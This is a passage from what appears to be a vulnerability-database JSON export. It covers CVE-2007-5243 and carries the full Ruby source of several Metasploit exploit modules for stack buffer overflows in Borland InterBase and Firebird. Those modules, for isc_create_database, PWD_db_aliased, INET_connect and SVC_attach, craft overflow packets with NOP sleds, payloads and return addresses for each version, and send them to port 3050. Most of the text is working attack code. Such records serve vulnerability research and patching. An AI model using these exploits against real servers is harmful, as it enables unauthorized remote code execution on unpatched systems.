source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::BruteTargets\n\n def initialize(info = {})\n super(update_info(info,\n 'Name'\t\t=> 'Borland InterBase isc_create_database() Buffer Overflow',\n 'Description'\t=> %q{\n This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted create request.\n },\n 'Author'\t=>\n [\n 'Ramon de C Valle',\n 'Adriano Lima <adriano[at]risesecurity.org>',\n ],\n 'Arch'\t\t=> ARCH_X86,\n 'Platform'\t=> 'win',\n 'References'\t=>\n [\n [ 'CVE', '2007-5243' ],\n [ 'OSVDB', '38606' ],\n [ 'BID', '25917' ],\n [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],\n ],\n 'Privileged'\t=> true,\n 'License'\t=> MSF_LICENSE,\n 'Payload'\t=>\n {\n 'Space' => 512,\n 'BadChars' => \"\\x00\\x2f\\x3a\\x40\\x5c\",\n 'StackAdjustment' => -3500,\n },\n 'Targets'\t=>\n [\n [ 'Brute Force', { } ],\n # 0x00403d4b pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V8.1.0.257',\n { 'Length' => [ 2116, 2120 ], 'Ret' => 0x00403d4b }\n ],\n # 0x00403d4d pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V8.0.0.123',\n { 'Length' => [ 2116, 2120 ], 'Ret' => 0x00403d4d }\n ],\n # 0x00403a5d pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80',\n { 'Length' => [ 2116, 2120 ], 'Ret' => 0x00403a5d }\n ],\n # 0x004038fd pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V7.0.1.1',\n { 'Length' => [ 2116, 2120 ], 'Ret' => 0x004038fd }\n ],\n # 0x0040390d pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V6.5.0.28',\n { 'Length' => [ 1332, 1336 ], 'Ret' => 0x0040390d }\n ],\n # 0x00403901 pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V6.0.1.6',\n { 'Length' => [ 1332, 1336 ], 'Ret' => 0x00403901 }\n ],\n # 0x004038b1 pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0',\n { 'Length' => [ 1332, 1336 ], 
'Ret' => 0x004038b1 }\n ],\n # 0x00404a10 pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V5.5.0.742',\n { 'Length' => [ 1432, 1436 ], 'Ret' => 0x00404a10 }\n ],\n # 0x00404a0e pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V5.1.1.680',\n { 'Length' => [ 1336, 1340 ], 'Ret' => 0x00404a0e }\n ],\n # Debug\n [\n 'Debug',\n { 'Length' => [ 1336 ], 'Ret' => 0xaabbccdd }\n ],\n ],\n 'DefaultTarget'\t=> 0,\n 'DisclosureDate' => 'Oct 03 2007'\n ))\n\n register_options(\n [\n Opt::RPORT(3050)\n ],\n self.class\n )\n\n end\n\n def exploit_target(target)\n\n target['Length'].each do |length|\n\n connect\n\n # Create database\n op_create = 20\n\n remainder = length.remainder(4)\n padding = 0\n\n if remainder > 0\n padding = (4 - remainder)\n end\n\n buf = ''\n\n # Operation/packet type\n buf << [op_create].pack('N')\n\n # Id\n buf << [0].pack('N')\n\n # Length\n buf << [length].pack('N')\n\n # Nop block\n buf << make_nops(length - payload.encoded.length - 13)\n\n # Payload\n buf << payload.encoded\n\n # Jump back into the nop block\n buf << \"\\xe9\" + [-1028].pack('V')\n\n # Jump back\n buf << \"\\xeb\" + [-7].pack('c')\n\n # Random alpha data\n buf << rand_text_alpha(2)\n\n # Target\n buf << [target.ret].pack('V')\n\n # Padding\n buf << \"\\x00\" * padding\n\n # Database parameter block\n\n # Length\n buf << [1024].pack('N')\n\n # Random alpha data\n buf << rand_text_alpha(1024)\n\n sock.put(buf)\n\n select(nil,nil,nil,4)\n\n handler\n\n end\n\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/misc/ib_isc_create_database.rb"}, {"lastseen": "2020-10-06T05:32:10", "description": "This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted create request.\n", "published": "2007-10-04T03:03:13", "type": "metasploit", "title": "Borland InterBase jrd8_create_database() Buffer Overflow", "bulletinFamily": 
"exploit", "cvelist": ["CVE-2007-5243"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/LINUX/MISC/IB_JRD8_CREATE_DATABASE", "href": "", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/ib_jrd8_create_database.rb"}, {"lastseen": "2020-10-06T05:12:53", "description": "This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted attach request.\n", "published": "1976-01-01T00:00:00", "type": "metasploit", "title": "Borland InterBase PWD_db_aliased() Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "1976-01-01T00:00:00", "id": "MSF:EXPLOIT/LINUX/MISC/IB_PWD_DB_ALIASED", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name'\t\t=> 'Borland InterBase PWD_db_aliased() Buffer Overflow',\n 'Description'\t=> %q{\n This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted attach request.\n },\n 'Author'\t=>\n [\n 'Ramon de C Valle',\n 'Adriano Lima <adriano[at]risesecurity.org>',\n ],\n 'Arch'\t\t=> ARCH_X86,\n 'Platform'\t=> 'linux',\n 'References'\t=>\n [\n [ 'CVE', '2007-5243' ],\n [ 'OSVDB', '38607' ],\n [ 'BID', '25917' ],\n [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],\n ],\n 'Privileged'\t=> true,\n 'License'\t=> MSF_LICENSE,\n 'Payload'\t=>\n {\n 'Space' => 512,\n 'BadChars' => \"\\x00\\x2f\\x3a\\x40\\x5c\",\n },\n 'Targets'\t=>\n [\n # 0x0804cbe4 pop esi; pop ebp; ret\n [\n 'Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253',\n { 'Ret' => 0x0804cbe4 }\n ],\n ],\n 'DefaultTarget'\t=> 0,\n 
'DisclosureDate' => 'Oct 03 2007'\n ))\n\n register_options(\n [\n Opt::RPORT(3050)\n ],\n self.class\n )\n\n end\n\n def exploit\n\n connect\n\n # Attach database\n op_attach = 19\n\n length = 1152\n remainder = length.remainder(4)\n padding = 0\n\n if remainder > 0\n padding = (4 - remainder)\n end\n\n buf = ''\n\n # Operation/packet type\n buf << [op_attach].pack('N')\n\n # Id\n buf << [0].pack('N')\n\n # Length\n buf << [length].pack('N')\n\n # It will return into this nop block\n buf << make_nops(length - payload.encoded.length - 4)\n\n # Payload\n buf << payload.encoded\n\n # Target\n buf << [target.ret].pack('V')\n\n # Padding\n buf << \"\\x00\" * padding\n\n # Length\n buf << [1024].pack('N')\n\n # Random alpha data\n buf << rand_text_alpha(1024)\n\n sock.put(buf)\n\n handler\n\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/ib_pwd_db_aliased.rb"}, {"lastseen": "2020-08-18T00:32:23", "description": "This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted service attach request.\n", "published": "2007-10-04T03:03:13", "type": "metasploit", "title": "Borland InterBase INET_connect() Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/LINUX/MISC/IB_INET_CONNECT", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name'\t\t=> 'Borland InterBase INET_connect() Buffer Overflow',\n 'Description'\t=> %q{\n This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted service attach request.\n },\n 
'Author'\t=>\n [\n 'Ramon de C Valle',\n 'Adriano Lima <adriano[at]risesecurity.org>',\n ],\n 'Arch'\t\t=> ARCH_X86,\n 'Platform'\t=> 'linux',\n 'References'\t=>\n [\n [ 'CVE', '2007-5243' ],\n [ 'OSVDB', '38605' ],\n [ 'BID', '25917' ],\n [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],\n ],\n 'Privileged'\t=> true,\n 'License'\t=> MSF_LICENSE,\n 'Payload'\t=>\n {\n 'Space' => 512,\n 'BadChars' => \"\\x00\\x2f\\x3a\\x40\\x5c\",\n },\n 'Targets'\t=>\n [\n # 0x0804d2ee 5b5e5f5dc3\n [\n 'Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253',\n { 'Ret' => 0x0804d2ee }\n ],\n ],\n 'DefaultTarget'\t=> 0,\n 'DisclosureDate' => 'Oct 03 2007'\n ))\n\n register_options(\n [\n Opt::RPORT(3050)\n ],\n self.class\n )\n\n end\n\n def exploit\n\n connect\n\n # Attach database\n op_attach = 19\n\n # Create database\n op_create = 20\n\n # Service attach\n op_service_attach = 82\n\n length = 161\n remainder = length.remainder(4)\n padding = 0\n\n if remainder > 0\n padding = (4 - remainder)\n end\n\n buf = ''\n\n # Operation/packet type\n buf << [op_service_attach].pack('N')\n\n # Id\n buf << [0].pack('N')\n\n # Length\n buf << [length].pack('N')\n\n # Random alpha data\n buf << rand_text_alpha(length - 5)\n\n # Target\n buf << [target.ret].pack('L')\n\n # Separator\n buf << ':'\n\n # Padding\n buf << \"\\x00\" * padding\n\n # Database parameter block\n\n # Length\n buf << [1024].pack('N')\n\n # It will return into this nop block\n buf << make_nops(1024 - payload.encoded.length)\n\n # Payload\n buf << payload.encoded\n\n sock.put(buf)\n\n handler\n\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/ib_inet_connect.rb"}, {"lastseen": "2020-10-06T04:58:57", "description": "This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted create request.\n", "published": "2007-10-04T03:03:13", 
"type": "metasploit", "title": "Firebird Relational Database isc_create_database() Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/MISC/FB_ISC_CREATE_DATABASE", "href": "", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/misc/fb_isc_create_database.rb"}, {"lastseen": "2020-07-19T04:25:26", "description": "This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted service attach request.\n", "published": "2007-10-04T03:03:13", "type": "metasploit", "title": "Borland InterBase SVC_attach() Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/MISC/IB_SVC_ATTACH", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::BruteTargets\n\n def initialize(info = {})\n super(update_info(info,\n 'Name'\t\t=> 'Borland InterBase SVC_attach() Buffer Overflow',\n 'Description'\t=> %q{\n This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted service attach request.\n },\n 'Author'\t=>\n [\n 'Ramon de C Valle',\n 'Adriano Lima <adriano[at]risesecurity.org>',\n ],\n 'Arch'\t\t=> ARCH_X86,\n 'Platform'\t=> 'win',\n 'References'\t=>\n [\n [ 'CVE', '2007-5243' ],\n [ 'OSVDB', '38605' ],\n [ 'BID', '25917' ],\n [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],\n ],\n 'Privileged'\t=> true,\n 'License'\t=> MSF_LICENSE,\n 'Payload'\t=>\n {\n 'Space' => 512,\n 'BadChars' => \"\\x00\\x2f\\x3a\\x40\\x5c\",\n 'StackAdjustment' => -3500,\n 
},\n 'Targets'\t=>\n [\n [ 'Brute Force', { } ],\n # 0x00403d4b pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V8.1.0.257',\n { 'Length' => [ 3660, 3664 ], 'Ret' => 0x00403d4b }\n ],\n # 0x00403d4d pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V8.0.0.123',\n { 'Length' => [ 3660, 3664 ], 'Ret' => 0x00403d4d }\n ],\n # 0x00403a5d pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80',\n { 'Length' => [ 3660, 3664 ], 'Ret' => 0x00403a5d }\n ],\n # 0x004038fd pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V7.0.1.1',\n { 'Length' => [ 3660, 3664 ], 'Ret' => 0x004038fd }\n ],\n # 0x0040390d pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V6.5.0.28',\n { 'Length' => [ 2116, 2120], 'Ret' => 0x0040390d }\n ],\n # 0x00403901 pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V6.0.1.6',\n { 'Length' => [ 2116, 2120 ], 'Ret' => 0x00403901 }\n ],\n # 0x004038b1 pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0',\n { 'Length' => [ 2116, 2120 ], 'Ret' => 0x004038b1 }\n ],\n # 0x00404a10 pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V5.5.0.742',\n { 'Length' => [ 2216, 2120 ], 'Ret' => 0x00404a10 }\n ],\n # 0x00404a0e pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V5.1.1.680',\n { 'Length' => [ 2120, 2124 ], 'Ret' => 0x00404a0e }\n ],\n # Debug\n [\n 'Debug',\n { 'Length' => [ 2120 ], 'Ret' => 0xaabbccdd }\n ],\n ],\n 'DefaultTarget'\t=> 0,\n 'DisclosureDate' => 'Oct 03 2007'\n ))\n\n register_options(\n [\n Opt::RPORT(3050)\n ],\n self.class\n )\n\n end\n\n def exploit_target(target)\n\n target['Length'].each do |length|\n\n connect\n\n # Service attach\n op_service_attach = 82\n\n remainder = length.remainder(4)\n padding = 0\n\n if remainder > 0\n padding = (4 - remainder)\n end\n\n buf = ''\n\n # Operation/packet type\n buf << [op_service_attach].pack('N')\n\n # Id\n buf << [0].pack('N')\n\n # Length\n buf << [length].pack('N')\n\n # Nop block\n buf << make_nops(length - 
payload.encoded.length - 13)\n\n # Payload\n buf << payload.encoded\n\n # Jump back into the nop block\n buf << \"\\xe9\" + [-1028].pack('V')\n\n # Jump back\n buf << \"\\xeb\" + [-7].pack('c')\n\n # Random alpha data\n buf << rand_text_alpha(2)\n\n # Target\n buf << [target.ret].pack('V')\n\n # Padding\n buf << \"\\x00\" * padding\n\n # Database parameter block\n\n # Length\n buf << [1024].pack('N')\n\n # Random alpha data\n buf << rand_text_alpha(1024)\n\n sock.put(buf)\n\n select(nil,nil,nil,4)\n\n handler\n\n end\n\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/misc/ib_svc_attach.rb"}, {"lastseen": "2020-10-06T04:56:45", "description": "This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted service attach request.\n", "published": "2007-10-04T03:03:13", "type": "metasploit", "title": "Firebird Relational Database SVC_attach() Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/MISC/FB_SVC_ATTACH", "href": "", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/misc/fb_svc_attach.rb"}]}